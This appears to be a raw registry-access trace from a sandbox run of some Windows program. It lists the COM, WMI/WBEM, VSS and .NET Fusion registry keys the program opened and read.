HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\InprocHandler HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\AECFFC7E HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\ HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaxSxSHashCount HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\FinalizerActivityBypass HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C49E32C6-BC8B-11D2-85D4-00105A1F8304}\InprocHandler HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winmgmt\Parameters HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\Tracing\WMI HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\SessionEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AreaFlags HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\Session HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MinimumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\MaximumFileSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\LogFileMode HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\FlushTimer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Tracing\WMI\AgeLimit HKEY_LOCAL_MACHINE\SYSTEM\Setup HKEY_LOCAL_MACHINE\SYSTEM\Setup\UpgradeInProgress HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Safeboot\Option HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\VssAccessControl HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Settings HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\ActiveWriterStateTimeout HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Diag\(Default) HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS\Diag\WMI Writer HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VSS\Settings\TornComponentsMax HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{00000100-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9555-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{609B9557-4FB6-11D1-9971-00C04FBBB345}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{F309AD18-D86A-11D0-A075-00C04FB68820}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TreatAs HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\Progid HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InprocHandler HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\IdentifierLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\QueryLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\PathLimit HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbThrottlingEnabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighMaxLimitFactor HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbTaskMaxSleep HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold1Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold2Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ArbSystemHighThreshold3Mult HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Unchecked Task Count HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Build HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Logging Directory HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Default Repository Driver HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueCoreFsrepVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Repository Cache Spill Ratio HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckPointValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SnapShotValue HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\CheckRepositoryOnNextStartup HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NumWriteIdCheck HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Size HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Class Cache Item Age (ms) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\NextAutoRecoverFile HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Enable Provider Subsystem HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{024D43BD-09FA-4CB3-A425-C9AFB00D8F9D}\ProcessIdentifier HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{1B619FBC-5204-4C91-8F2A-B6406B0F0278}\ProcessIdentifier HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{D1398C3F-1B66-4A30-916D-776E1DDE80A1}\ProcessIdentifier HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Provider HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Scope HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\Locale HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\User HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\MarshaledProxy HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Client\{EFE6E846-7D3A-45F6-A5FA-A686F2785670}\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\CreationTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\Transports\Decoupled\Server\ProcessIdentifier HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\EnableEvents HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssToBeInitialized HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Low Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\High Threshold On Events (B) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Wait On Events (ms) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Merger Query Arbitration Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ConfigValueEssNeedsLoading HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\List of event-active namespaces HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\ESS\//./root/subscription HKEY_LOCAL_MACHINE\software\microsoft\wbem\cimom HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\SetupDate HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\CIMOM HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerBatchSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\ClientCallbackTimeout HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\FinalizerQueueThreshold HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Tasks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Max Async Result Queue Size HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\cimv2 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\cimv2 HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InProcServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\(Default) HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\InprocServer32\Synchronization HKEY_CLASSES_ROOT\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{661FF7F6-F4D1-4593-B59D-4C54C1ECE68B}\AppId HKEY_LOCAL_MACHINE\system\currentcontrolset\control\minint HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\wmi HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\wmi HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC}\InProcServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\(Default) HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC}\LocalServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\ThreadingModel HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\InprocServer32\Synchronization HKEY_CLASSES_ROOT\CLSID\{D2D588B5-D081-11d0-99E0-00C04FC2F8EC} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D2D588B5-D081-11D0-99E0-00C04FC2F8EC}\AppId HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\Root HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\Root HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{07435309-D440-41B7-83F3-EB82DB6C622F}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{21CD80A2-B305-4F37-9D4C-4534A8D9B568}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06413D98-405C-4A5A-8D6F-19B8B7C6ACF7}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\Sink Transmit Buffer Size HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Cimom HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\CIMOM\DefaultRpcStackSize HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\CMF\Config HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\CMF\Config\SYSTEM HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\wmiprvse.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\InprocServer32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\InprocHandler32 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\InprocHandler HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\WDM HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\IDE\DiskVBOX_HARDDISK___________________________1.0_____\5&33d1638a&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910} HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WBEM\WDM\WMIBinaryMofResource.HighDateTime=30016556,LowDateTime=1652017424,Name="C:\Windows\system32\advapi32.dll[MofResourceName]"
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index36 